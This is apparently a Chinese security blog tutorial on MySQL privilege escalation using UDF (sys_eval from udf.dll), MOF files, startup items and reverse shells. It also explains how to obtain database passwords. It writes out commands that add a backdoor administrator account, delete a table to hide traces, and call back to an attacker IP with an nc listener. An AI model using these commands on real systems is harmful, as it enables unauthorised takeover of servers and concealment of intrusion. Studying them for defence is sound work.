type
status
date
slug
summary
tags
category
icon
password
0x00 mysql数据库提权方式简介
1)udf提权2)mof提权3)启动项提权-反弹shell-exp提权提权思路:1.探针数据库的存在-端口服务,2.必须获取到数据库的权限密码,3.数据库的类型分类重点:数据库的账号密码获取方式,1.网站配置文件sql data inc config conn database commin include等2.读取数据库备份文件下的库中表等信息,数据库名/表名.MYD文件储存密码,例如mysql数据库在mysql_user表中储存账户密码,使用cmd5-mysql5解码3.暴力破解账户密码,需要支持外联,mysql一般不支持外联,需要手动打开数据库密码本地爆破:将php脚本放在本地,运行msf爆破数据库密码使用 scanner mysql_login模块 需要支持外联
0x01 UDF提权
UDF介绍:User DefinedFunctions简称UDF,通俗来讲就是用户可自定义函数。udf提权就是利用到创建自定义函数(sys_eval),在mysql中调用这个自定义的函数(sys_eval)来实现获取对方主机的system的shell权限,从而达到提权的目的。简单来说便是利用提权脚本放到对方mysql指定的目录下,运用脚本创建自定义函数,使用函数即可获取shell权限。我们需要将duf.dll文件放入C:\phpStudy\MySQL\lib\plugin,前面路劲可能跟我不一样,但是需要做的就是将dll文件放入\lib\plugin目录中Mysql版本大于5.1版本:udf.dll文件必须放置于MYSQL安装目录下的lib\plugin文件夹下。Mysql版本小于5.1版本: udf.dll文件在Windows2003下放置于c:\windows\system32,在windows2000下放置于c:\winnt\system32。如果目录不存在则利用NTFS数据流创建文件目录
提权条件
1)获取到对方mysql的shell,或者是获取到mysql账号密码,能够调用mysql语句
2)对方mysql具有insert和delete权限,也就是可写可删除添加能够创建目录,写入文件
验证是否可写:
如果secure_file_priv值为空则可写,为指定路劲则是指定路劲可写,需要全部可写需要在mysql.ini配置文件添加语句:即可
secure_file_priv是限制函数在哪个目录下拥有上传或者读取文件的权限
3)熟悉对方mysql目录结构,以及主机型号,以便使用不同的脚本
查看主机架构,以便确认操作系统位数,使用不同的udf.dll脚本
确定mysql目录结构,搜索我们需要的目录位置
查看plugin目录位置
3)提权脚本我在这里简称udf.dll
在kali里面自带udf提权脚本,并且有32位与64位版本,使用只需要将文件导出使用即可
目录位置
UDF提权步骤
1)将文件放入\lib\plugin目录下
方法1.getshell工具连接,将文件放入指定位置
2.使用mysql终端,创建自定义函数sys_eval
create function sys_eval returns string soname 'udf.dll';
方法2.数据库创建目录,并且导入文件
更多的方法有的通过mysql大马创建,原理都差不多
2)调用脚本创建sys_eval函数,验证提权
还有一种利用msf提权udf方法,这里没有简述,msf默认创建sys_exec()函数,该函数执行并不会有回显返回值只有0或1,1为错误,0为正确
提权常用命令
- select cmdshell(‘net user hsy 123456 /add’); #添加用户
- select cmdshell(‘net localgroup administrators hsy /add’); #将用户加到管理组
- drop function sys_eval; #删除函数
- DROP TABLE data; //为了删除痕迹,把刚刚新建的data表删掉
0x02 mof提权
mof提权原理
成功率低 替换原来文件 自启动原理
另外一种mysql提权方式叫做mof提权
在windows系统下 (在c:/windows/system32/wbem/ mof /nullevt. mof)存在一个mof文件,他的特点是,每个极短一段时间,便会以system权限自动运行文件内脚本,mof提权就是将我们写好的mof文件导入到该目录该文件里门,让他自行执行我们的语句,达到我们想要的效果
提权条件
1)获取到对方mysql的shell,或者是获取到mysql账号密码,能够调用mysql语句
2)目录可写入
对方mysql具有insert和delete权限,也就是可写可删除添加能够创建目录,写入文件
验证是否可写:
如果secure_file_priv值为空则可写,为指定路劲则是指定路劲可写,需要全部可写需要在mysql.ini配置文件添加语句:即可
secure_file_priv是限制函数在哪个目录下拥有上传或者读取文件的权限
提权exp
利用MySQL将文件写入目录
执行完毕替换net user hsy 123456 /add换为net localgroup administrators hsy/add 即可将用户提升管理员权限
0x03 自启动提权与反弹shell提权
mysql开启外联
使用msf 搜索使用mysql start-up模块 设置目标IP 账号密码 还可以写入反弹shell接受IP 写入启动项 需要对方启动系统,如果权限不够高,可以尝试反弹shell能否获取更高权限
反弹shell提权
mysql创建反弹函数select backshell('发送到的ip地址','端口'),kali使用nc监听本地(攻击机)IP nc -l(本地)-p 端口
linux提权手段:
suid授权 sudo授权
使用suid提权
内核版本提权
交流学习:
CSND社区:告白热
- 作者:告白
- 链接:https://www.gbsec.top/article/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87-mysql%E6%8F%90%E6%9D%83
- 声明:本文采用 CC BY-NC-SA 4.0 许可协议,转载请注明出处。
相关文章